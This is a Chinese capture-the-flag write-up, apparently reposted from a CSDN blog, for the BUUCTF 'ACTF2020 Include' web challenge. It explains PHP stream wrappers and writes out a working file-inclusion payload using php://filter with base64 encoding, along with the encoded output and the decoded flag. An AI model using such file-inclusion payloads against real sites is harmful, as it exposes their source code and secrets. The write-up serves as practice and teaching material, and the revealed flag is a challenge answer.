其他分享
首页 > 其他分享> > web buuctf [ACTF2020 新生赛]Include1

web buuctf [ACTF2020 新生赛]Include1

作者:互联网

1.线索:查看tips页面源代码,只有一个标签传参链接?file=flag.php;

             点击查看传参后几面源代码,网页上只有“Can you find out the flag?”一句话

2.分析:没有sql注入点

             提示can you find out the flag,且传递的file是flag.php

             flag是否在flag.php中

             尝试查看一下flag.php代码

3.知识储备: php伪协议;base64

相关链接:https://segmentfault.com/a/1190000018991087

这里用的是查看源代码的:php://filter

//这里单独拿出来了,大家可以自行学习

php:// 协议

php://filter/read=convert.base64-encode/resource=[文件名]读取文件源码(针对php文件需要base64编码)

php://input + [POST DATA]执行php代码

4.构造payload

?file=php://filter/read=convert.base64-encode/resource=flag.php

打开界面后得到:

PD9waHAKZWNobyAiQ2FuIHlvdSBmaW5kIG91dCB0aGUgZmxhZz8iOwovL2ZsYWd7OTI4Zjc5N2UtOTY4MC00OTI4LTkxMTEtNTllZGUxNmU4NGJmfQo= 

进行base64解码,得到:

flag{928f797e-9680-4928-9111-59ede16e84bf}

标签:web,ACTF2020,buuctf,base64,convert,filter,flag,过滤器,php
来源: https://blog.csdn.net/weixin_44214568/article/details/119374307